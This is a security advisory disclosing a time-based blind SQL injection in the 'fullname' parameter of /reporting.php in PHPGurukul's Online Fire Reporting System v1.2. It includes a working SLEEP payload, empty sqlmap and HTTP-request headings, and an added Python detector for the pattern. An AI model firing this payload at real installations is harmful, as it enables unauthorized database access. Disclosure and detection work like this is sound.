Key Information

Vulnerability Description
- Vulnerability type: SQL injection (SQLi)
- Affected system: Online Fire Reporting System v1.2
- File: /reporting.php

Vendor Information
- Vendor: PHPGurukul
- Project: Online Fire Reporting System

Vulnerability Details
- Version: V1.2
- Vulnerable file: /reporting.php

PoC (Proof of Concept)

sqlmap command:

HTTP request example:

Injection point:
- Parameter: fullname (POST)
- Type: time-based blind
- Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
- Payload:

```
fullname=1' AND (SELECT 4364 FROM (SELECT(SLEEP(5)))JHEp) AND 'uDFv'='uDFv&mobilenumber=1&location=1&message=1&submit=%E6%9F%9C%E4%BA%A4%E6%9F%A5%E8%AF%A2
```
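For detection, the following added example (not part of the original advisory or the vendor's code) decodes a form-encoded POST body for /reporting.php and flags fields that carry the time-based blind pattern shown in the payload. The function names, the `BENCHMARK` pattern and the benign sample are assumptions introduced here.

```python
import re
from urllib.parse import parse_qsl

# Request body exactly as given in the advisory's payload line.
ADVISORY_BODY = (
    "fullname=1' AND (SELECT 4364 FROM (SELECT(SLEEP(5)))JHEp) AND 'uDFv'='uDFv"
    "&mobilenumber=1&location=1&message=1&submit=%E6%9F%9C%E4%BA%A4%E6%9F%A5%E8%AF%A2"
)
# Constructed benign submission: an apostrophe in a name must not raise a finding.
BENIGN_BODY = "fullname=John+O'Andrews&mobilenumber=5550100&location=Main+St&message=smoke+seen"

# SLEEP is the delay primitive in the advisory; BENCHMARK is an added assumption.
DELAY_CALL = re.compile(r"\b(sleep|benchmark)\s*\(", re.IGNORECASE)
# A quote that closes the string literal, directly followed by a boolean operator.
QUOTE_BREAKOUT = re.compile(r"['\"]\s*(and|or)\b", re.IGNORECASE)
INLINE_COMMENT = re.compile(r"/\*.*?\*/", re.DOTALL)


def normalize(value):
    """Replace inline SQL comments with a space and collapse whitespace."""
    value = INLINE_COMMENT.sub(" ", value)
    return re.sub(r"\s+", " ", value).strip()


def flag_time_based_sqli(body):
    """Return {parameter: [reasons]} for fields matching the time-based blind pattern."""
    findings = {}
    # parse_qsl splits on '&', then on the first '=', and percent-decodes each value.
    for name, raw in parse_qsl(body, keep_blank_values=True):
        value = normalize(raw)
        reasons = []
        if DELAY_CALL.search(value):
            reasons.append("delay-function call")
        if QUOTE_BREAKOUT.search(value):
            reasons.append("quote followed by boolean operator")
        if reasons:
            findings[name] = reasons
    return findings


if __name__ == "__main__":
    for label, body in (("advisory", ADVISORY_BODY), ("benign", BENIGN_BODY)):
        print(label, flag_time_based_sqli(body))
```

A match is a triage signal for the request log or WAF layer; the fix itself belongs in /reporting.php, where the `fullname` value should reach the database only as a bound parameter.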